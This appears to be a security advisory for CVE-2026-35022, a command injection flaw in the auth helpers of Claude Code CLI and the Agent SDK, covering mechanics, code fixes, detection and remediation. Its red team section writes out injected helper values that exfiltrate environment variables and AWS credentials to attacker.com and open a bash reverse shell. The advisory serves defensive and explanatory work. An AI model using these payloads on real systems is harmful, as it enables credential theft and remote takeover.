CVE-2026-35022
Executive Summary
CVE-2026-35022 is a critical OS command injection vulnerability (CVSS 9.8) in Anthropic's Claude Code CLI and Claude Agent SDK. The flaw resides in the authentication helper execution mechanism, where helper configuration values are passed to a shell using shell=true without any input validation or sanitization. An attacker who can influence authentication settings—such as through a compromised configuration file, a malicious CI/CD pipeline, or a supply chain attack—can inject arbitrary shell metacharacters via parameters like apiKeyHelper, awsAuthRefresh, awsCredentialExport, and gcpAuthRefresh. This allows remote code execution with the privileges of the user or automation environment, leading to credential theft, environment variable exfiltration, and full system compromise.

Supply Chain & Package Security
This vulnerability affects Anthropic's proprietary CLI and SDK packages distributed via npm and PyPI. Users who install these packages from public registries are at risk if they use untrusted configuration sources. The lack of input validation in authentication helpers means that any third-party package or configuration file that influences these settings can trigger command injection. Organizations should audit their dependency trees and ensure that configuration files are not writable by untrusted users.

- Availability Impact: High (A:H) – Potential for denial of service or system takeover.
Deep Dive & Mechanics
The vulnerability exists in the authentication helper execution logic of both the Claude Code CLI and the Claude Agent SDK. When the application needs to authenticate with external services (e.g., AWS, GCP), it reads configuration values from a settings file or environment variables. These values include paths or commands for helpers like apiKeyHelper, awsAuthRefresh, awsCredentialExport, and gcpAuthRefresh. The application then executes these helpers using a shell command with shell=true, which passes the entire string to the system shell for interpretation.
Because the configuration values are not sanitized, an attacker can inject shell metacharacters such as ;, |, &&, or backticks. For example, if an attacker can set apiKeyHelper to helper.sh; curl http://attacker.com/$(env), the shell will execute helper.sh and then run curl http://attacker.com/$(env), exfiltrating all environment variables.
The attack surface includes:
- Configuration file tampering: If an attacker can write to the configuration file (e.g.,
~/.claude/config.json), they can inject malicious helper values. - CI/CD pipeline poisoning: In automated environments, environment variables or configuration files may be influenced by pull requests or external inputs.
- Supply chain attacks: A malicious npm/PyPI package could modify the configuration during installation.
Vulnerable vs. Patched Code
Vulnerable Code (Conceptual):
// Vulnerable: shell=true without sanitization
const { exec } = require('child_process');
const helper = config.apiKeyHelper; // e.g., "helper.sh; malicious_command"
exec(helper, { shell: true }, (error, stdout, stderr) => {
// process output
});
Patched Code (Conceptual):
// Patched: Use shell=false and pass arguments safely
const { spawn } = require('child_process');
const helper = config.apiKeyHelper; // e.g., "helper.sh"
const args = []; // arguments are passed separately
spawn(helper, args, { shell: false, stdio: 'inherit' });
The patched version avoids using shell=true and instead uses spawn with shell=false, which prevents shell metacharacter injection. Additionally, input validation should be added to ensure that helper paths do not contain dangerous characters.
Exploitation & Lab Setup
Red Team
Prerequisites:
- Access to modify the Claude configuration file (e.g.,
~/.claude/config.jsonor environment variables). - Target system running Claude Code CLI or Claude Agent SDK.
Exploitation Steps:
- Modify the configuration file to set a malicious helper value:
{ "apiKeyHelper": "helper.sh; curl http://attacker.com/$(env)" } - Trigger the authentication flow (e.g., by running a Claude command that requires API key retrieval).
- The shell executes the injected command, exfiltrating environment variables to the attacker's server.
Alternative Payloads:
- Reverse shell:
helper.sh; bash -i >& /dev/tcp/attacker.com/4444 0>&1 - Credential theft:
helper.sh; cat ~/.aws/credentials | curl -X POST http://attacker.com/creds --data-binary @-
Blue Team
Detection:
- Monitor for unusual child processes spawned by the Claude CLI or SDK.
- Look for shell commands containing metacharacters in process arguments.
- Alert on outbound connections to unknown IPs immediately after Claude authentication events.
Hunting:
- Search for configuration files containing shell metacharacters in helper values.
- Review CI/CD logs for unexpected command execution during Claude authentication.
Indicators of Compromise (IOCs)
File-based IOCs:
- Configuration files (
~/.claude/config.json,~/.claude/config.yaml) containing shell metacharacters in helper fields. - Unexpected scripts or binaries in the user's home directory or temporary directories.
- Configuration files (
Network IOCs:
- Outbound connections to attacker-controlled IPs on ports 80, 443, or 4444.
- DNS queries to domains associated with known C2 infrastructure.
Process IOCs:
- Child processes of
claudeorclaude-agentthat include shell commands (e.g.,sh -c,bash -c). - Processes with arguments containing
;,|,&&, or backticks.
- Child processes of
Environment IOCs:
- Modified environment variables that include malicious helper paths.

Remediation & Mitigation
Immediate Actions:
- Disable authentication helpers if not required, or restrict them to trusted, hardcoded paths.
- Audit configuration files for any shell metacharacters in helper fields.
- Apply input validation to ensure helper values contain only alphanumeric characters, slashes, and dots.
Long-term Fixes:
- Patch the SDK/CLI to use
shell=falseand pass arguments as separate parameters. - Implement a whitelist of allowed helper executables.
- Use environment variables instead of configuration files for sensitive settings.
Workarounds:
- Run Claude in a sandboxed environment (e.g., Docker container) with minimal privileges.
- Monitor and alert on any changes to Claude configuration files.
Detection:
- Deploy the provided YARA, Sigma, and Suricata rules.
- Enable process auditing on systems running Claude.
